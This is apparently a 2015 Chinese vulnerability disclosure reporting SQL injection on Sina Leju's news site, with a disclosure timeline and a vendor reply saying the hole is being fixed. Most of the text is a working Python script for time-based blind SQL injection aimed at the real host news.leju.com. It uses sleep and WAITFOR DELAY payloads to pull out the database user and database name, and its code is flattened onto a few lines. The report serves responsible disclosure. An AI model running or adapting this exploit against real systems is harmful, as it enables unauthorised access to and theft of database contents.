2015-01-14: 细节已通知厂商并且等待厂商处理中 2015-01-14: 厂商已经确认,细节仅向厂商公开 2015-01-24: 细节向核心白帽子及相关领域专家公开 2015-02-03: 细节向普通白帽子公开 2015-02-13: 细节向实习白帽子公开 2015-02-28: 细节向公众公开
新浪乐居房产分站存在SQL注入(附验证脚本)
current result is gdis
#!/usr/bin/python# coding=utf-8import httplib,time,string,sys,random,urllibdef getPayloadURL(url,i,payload,payload_type): if payload_type == 1: s = "if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 2: s = "if(ascii(mid(database(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 3: s = "W8ul0scE';if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 4: s = "W8ul0scE';if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 5: s = "aa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 6: s = "aa'XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 7: s = "-1;if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 8: s = "-1;if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 9: s = "-1;if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 10: s = "-1;if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) return url + urllib.quote(s)def exploit(host,url,payload_type,timeout=5): res = '' payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ] for i in range(1,30,1): for payload in payloads: try: conn = httplib.HTTPConnection(host, timeout=timeout) print payload, conn.request(method='GET',url=getPayloadURL(url,i,payload,payload_type),headers={}) sys.stdout.flush() conn.getresponse().read() conn.close() except Exception,e: res += payload print "\ncurrent result is",res break print resif __name__=='__main__': host = 'news.leju.com' url= '/default/search/index/?text=*' payload_type = 5 exploit(host,url,payload_type)
危害等级:中
漏洞Rank:5
确认时间:2015-01-14 15:08
感谢关注新浪安全,漏洞修复中。
暂无